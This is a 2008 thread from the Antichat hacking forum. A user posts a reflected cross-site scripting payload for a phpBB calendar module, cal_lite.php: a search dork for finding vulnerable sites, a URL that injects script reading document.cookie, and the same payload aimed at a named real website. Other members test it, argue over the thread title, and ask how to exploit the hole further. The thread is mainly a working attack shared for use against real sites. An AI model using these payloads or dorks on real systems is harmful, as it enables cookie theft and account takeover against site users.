Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   xss в модуле cal_lite.php \PhpBB\ (https://forum.antichat.xyz/showthread.php?t=64427)

ReVOLVeR 15.03.2008 22:22

xss в модуле cal_lite.php \PhpBB\
 
inurl:cal_lite.php

cal_lite.php?id=12&mode=display&cl_d=%3Cscript%3Ea lert(document.cookie)%3C/script%3E&cl_m=11&cl_y=2007

a1ex 15.03.2008 22:24

Сейчас потестим....

ReVOLVeR 15.03.2008 22:26

к примеру
_http://www.airsoftgun.ru/phpBB/cal_lite.php??id=12&mode=display&cl_d=%3Cscript%3E alert(document.cookie)%3C/script%3E&cl_m=11&cl_y=2007

a1ex 15.03.2008 22:27

Не на всех работает.

Zedobat 15.03.2008 22:31

Название темы не отвечает содержимому.

XSS не в phpbb а в модуле который использует этот cal_lite.php, тк на большинстве форумах его нету.

ReVOLVeR 15.03.2008 22:33

Zedobat модуль чего модуль форума phpbb + разводиш флэйм в теме на это есть болталка..

a1ex 15.03.2008 22:36

ТС каким образом можно дальше юзать xss.
Распиши пожалуйста.Обьясни.

fucker"ok 15.03.2008 22:38

Такого файла нет ни в phpbb 2.x ни в 3.x.

ReVOLVeR 15.03.2008 22:38

fucker"ok это модуль...

Zedobat 15.03.2008 22:39

Цитата:

xss in phpBB all version
inurl:cal_lite.php - Результаты 1 - 10 из примерно 9 580
powered by phpbb - Результаты 1 - 10 из примерно 9 890 000

И где же "in phpBB all version" ?


Время: 19:05